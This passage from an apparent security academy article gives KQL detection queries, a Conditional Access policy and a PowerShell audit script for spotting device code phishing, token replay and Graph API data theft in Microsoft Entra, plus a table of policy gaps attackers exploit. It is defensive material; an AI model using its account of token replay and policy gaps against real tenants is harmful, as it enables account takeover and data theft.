tostring(LocationDetails.countryOrRegion),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    City = tostring(LocationDetails.city)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Count = count(),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UniqueIPs = dcount(IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Countries = make_set(Country),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LastSeen = max(TimeGenerated)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by UserPrincipalName, AppDisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Count &gt; 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by LastSeen desc</span><br></span></code></pre></div></div>\n<p><strong>Tighter version  alert on any device code sign-in for users not in an allowlist:</strong></p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Maintain an allowlist of users/apps with legitimate device code needs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let AllowedDeviceCodeUsers = dynamic([</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"iot-admin@company.com\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"printserver-svc@company.com\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">]);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName !in (AllowedDeviceCodeUsers)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, IPAddress, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          AppDisplayName, LocationDetails, CorrelationId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<p>Expected false positive rate when allowlist is properly configured: near zero. Device code flow has no legitimate user-facing application in most enterprise environments.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"52-detect-token-replay-via-impossible-travel-in-noninteractive-logs\">5.2 Detect Token Replay via Impossible Travel in NonInteractive Logs<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#52-detect-token-replay-via-impossible-travel-in-noninteractive-logs\" class=\"hash-link\" aria-label=\"Direct link to 5.2 Detect Token Replay via Impossible Travel in NonInteractive Logs\" title=\"Direct link to 5.2 Detect Token Replay via Impossible Travel in NonInteractive Logs\" translate=\"no\">​</a></h3>\n<p>This query deliberately targets the gap  non-interactive sign-ins are where token replay hides:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect impossible travel in NonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// (The table most orgs forget to monitor)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let TimeDeltaThresholdMinutes = 60;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let MinDistanceKm = 500;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">NonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Lat = toreal(LocationDetails.geoCoordinates.latitude),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Lon = toreal(LocationDetails.geoCoordinates.longitude),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Country = tostring(LocationDetails.countryOrRegion)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnotempty(Lat) and isnotempty(Lon)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by UserPrincipalName asc, TimeGenerated asc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| serialize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevLat = prev(Lat, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevLon = prev(Lon, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevTime = prev(TimeGenerated, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevUser = prev(UserPrincipalName, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName == PrevUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TimeDeltaMin = datetime_diff('minute', TimeGenerated, PrevTime),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DistanceKm = 111.0 * sqrt(pow(Lat - PrevLat, 2) + pow(Lon - PrevLon, 2))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeDeltaMin &lt; TimeDeltaThresholdMinutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where DistanceKm &gt; MinDistanceKm</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          CurrentIP = IPAddress, CurrentCountry = Country,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          TimeDeltaMin, DistanceKm, AppDisplayName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          UniqueTokenIdentifier</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"53-correlate-token-usage-to-graph-api-activity\">5.3 Correlate Token Usage to Graph API Activity<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#53-correlate-token-usage-to-graph-api-activity\" class=\"hash-link\" aria-label=\"Direct link to 5.3 Correlate Token Usage to Graph API Activity\" title=\"Direct link to 5.3 Correlate Token Usage to Graph API Activity\" translate=\"no\">​</a></h3>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Join SigninLogs to MicrosoftGraphActivityLogs to see what a token did</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Requires Graph Activity Logs to be configured in Log Analytics</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let SuspiciousTokens = SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UniqueTokenIdentifier, UserPrincipalName, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              SigninTime = TimeGenerated, SigninIP = IPAddress;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">MicrosoftGraphActivityLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=inner SuspiciousTokens on $left.UniqueTokenIdentifier == $right.UniqueTokenIdentifier</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, RequestUri, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          ResponseStatusCode, ClientIpAddress, SigninIP</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated asc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"54-detect-prt-based-device-registration-abuse\">5.4 Detect PRT-Based Device Registration Abuse<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#54-detect-prt-based-device-registration-abuse\" class=\"hash-link\" aria-label=\"Direct link to 5.4 Detect PRT-Based Device Registration Abuse\" title=\"Direct link to 5.4 Detect PRT-Based Device Registration Abuse\" translate=\"no\">​</a></h3>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// High-fidelity: device registered immediately after device code auth</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Near-zero false positive rate in standard enterprise environments</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let lookback = 1h;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let DeviceCodeEvents = SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UserPrincipalName, DCTime = TimeGenerated, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              DCIPAddress = IPAddress, CorrelationId;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName in (\"Register device\", \"Add registered users to device\", </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                           \"Add member to role\", \"Add eligible member to role\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend ActorUPN = tostring(InitiatedBy.user.userPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnotempty(ActorUPN)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=inner DeviceCodeEvents on $left.ActorUPN == $right.UserPrincipalName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend TimeDelta = TimeGenerated - DCTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeDelta between (0min .. lookback)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project ActorUPN, OperationName, TimeGenerated, DCTime, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          TimeDelta, DCIPAddress,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          TargetResource = tostring(TargetResources[0].displayName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"55-hunt-for-refresh-token-abuse-patterns-bulk-graph-api-access\">5.5 Hunt for Refresh Token Abuse Patterns (Bulk Graph API Access)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#55-hunt-for-refresh-token-abuse-patterns-bulk-graph-api-access\" class=\"hash-link\" aria-label=\"Direct link to 5.5 Hunt for Refresh Token Abuse Patterns (Bulk Graph API Access)\" title=\"Direct link to 5.5 Hunt for Refresh Token Abuse Patterns (Bulk Graph API Access)\" translate=\"no\">​</a></h3>\n<p>Legitimate users don't query the Graph API in bulk at 3 AM:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect anomalous Graph API query volume from non-interactive sessions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Indicator of automated data exfiltration using stolen tokens</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">MicrosoftGraphActivityLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where RequestMethod in (\"GET\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Hour = hourofday(TimeGenerated),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UPN = tostring(UserId)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    RequestCount = count(),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UniqueEndpoints = dcount(RequestUri),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UniqueTokens = dcount(UniqueTokenIdentifier)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by UPN, bin(TimeGenerated, 1h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where RequestCount &gt; 500</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Hour between (0 .. 6)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by RequestCount desc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-6--the-conditional-access-gaps-why-your-policy-probably-has-holes\">Part 6  The Conditional Access Gaps: Why Your Policy Probably Has Holes<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-6--the-conditional-access-gaps-why-your-policy-probably-has-holes\" class=\"hash-link\" aria-label=\"Direct link to Part 6  The Conditional Access Gaps: Why Your Policy Probably Has Holes\" title=\"Direct link to Part 6  The Conditional Access Gaps: Why Your Policy Probably Has Holes\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"61-the-condition-that-blocks-device-code-phishing-and-why-its-not-deployed\">6.1 The Condition That Blocks Device Code Phishing (And Why It's Not Deployed)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#61-the-condition-that-blocks-device-code-phishing-and-why-its-not-deployed\" class=\"hash-link\" aria-label=\"Direct link to 6.1 The Condition That Blocks Device Code Phishing (And Why It's Not Deployed)\" title=\"Direct link to 6.1 The Condition That Blocks Device Code Phishing (And Why It's Not Deployed)\" translate=\"no\">​</a></h3>\n<p>Microsoft added the <strong>Authentication Flows</strong> Conditional Access condition specifically to address device code abuse:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Conditional Access Policy: \"Block Device Code Flow\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Assignments:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Users: All users</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Exclude: Break-glass accounts, service accounts with documented IoT needs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Target Resources:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Cloud apps: All cloud apps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Conditions:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Authentication flows: Device code flow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Grant:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Block access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<p><strong>Before enabling in enforcement mode, audit your environment:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"AuditLog.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$filter = \"authenticationProtocol eq 'deviceCode' and \" +</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          \"createdDateTime ge $(([datetime]::UtcNow.AddDays(-30)).ToString('o'))\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$signIns = Get-MgAuditLogSignIn -Filter $filter -All -Top 999</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$signIns | Select-Object -Property UserPrincipalName, AppDisplayName, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPAddress, CreatedDateTime | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Group-Object UserPrincipalName | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Sort-Object Count -Descending |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Name, Count, @{N='Apps';E={($_.Group.AppDisplayName | Sort-Object -Unique) -join ', '}} |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Export-Csv \"device_code_usage.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"62-the-six-most-common-conditional-access-gaps\">6.2 The Six Most Common Conditional Access Gaps<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#62-the-six-most-common-conditional-access-gaps\" class=\"hash-link\" aria-label=\"Direct link to 6.2 The Six Most Common Conditional Access Gaps\" title=\"Direct link to 6.2 The Six Most Common Conditional Access Gaps\" translate=\"no\">​</a></h3>\n<table><thead><tr><th>Gap</th><th>Why It Exists</th><th>What an Attacker Exploits</th></tr></thead><tbody><tr><td><strong>Device code flow not blocked</strong></td><td>Policy condition added by Microsoft in 2023  many tenants haven't revisited CA policies since</td><td>Full device code phishing as described above</td></tr><tr><td><strong>Non-interactive sign-ins not evaluated</strong></td><td>CA policies apply to interactive flows by default</td><td>Stolen refresh token replayed silently bypasses current-state CA evaluation</td></tr><tr><td><strong>Compliant device requirement not enforced for web apps</strong></td><td>Friction concerns</td><td>Token replayed in non-compliant browser bypasses device requirement</td></tr><tr><td><strong>Named Locations not maintained</strong></td><td>IT lists corporate office IPs but forgets VPN egress, trusted vendor ranges</td><td>All authenticated sessions from \"unknown\" locations generate low-signal alerts</td></tr><tr><td><strong>Legacy authentication not fully blocked</strong></td><td>Some legacy apps break when legacy auth is disabled</td><td>Brute-force via SMTP, IMAP, EWS  these protocols don't support MFA at all</td></tr><tr><td><strong>Admin role assignments not MFA + PIM protected</strong></td><td>Convenience: admins dislike step-up auth</td><td>Stolen token from standard user account can be used to escalate if admin roles aren't PIM-gated</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"63-continuous-access-evaluation--what-it-does-and-doesnt-protect\">6.3 Continuous Access Evaluation  What It Does and Doesn't Protect<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#63-continuous-access-evaluation--what-it-does-and-doesnt-protect\" class=\"hash-link\" aria-label=\"Direct link to 6.3 Continuous Access Evaluation  What It Does and Doesn't Protect\" title=\"Direct link to 6.3 Continuous Access Evaluation  What It Does and Doesn't Protect\" translate=\"no\">​</a></h3>\n<p>Continuous Access Evaluation (CAE) allows certain Microsoft services (Exchange Online, SharePoint, Teams, Graph) to re-evaluate access in near-real-time when risk signals change.</p>\n<p><strong>What CAE protects against:</strong></p>\n<ul>\n<li class=\"\">User account disabled → access revoked within minutes (not at next token expiry)</li>\n<li class=\"\">Password reset → refresh tokens invalidated quickly</li>\n<li class=\"\">High-risk event detected by Identity Protection → access blocked within minutes for CAE-capable clients</li>\n</ul>\n<p><strong>What CAE does NOT protect against:</strong></p>\n<ul>\n<li class=\"\">Attacker using the access token during its remaining lifetime (~60 min) before revocation propagates</li>\n<li class=\"\">Clients that don't support CAE (many third-party apps, older clients)</li>\n<li class=\"\">The 10–15 minute propagation delay between revocation action and enforcement even in CAE-capable clients</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"64-token-lifetime-configuration-what-you-can-actually-control\">6.4 Token Lifetime Configuration: What You Can Actually Control<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#64-token-lifetime-configuration-what-you-can-actually-control\" class=\"hash-link\" aria-label=\"Direct link to 6.4 Token Lifetime Configuration: What You Can Actually Control\" title=\"Direct link to 6.4 Token Lifetime Configuration: What You Can Actually Control\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Create a custom policy with shorter access token lifetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$tokenLifetimePolicy = 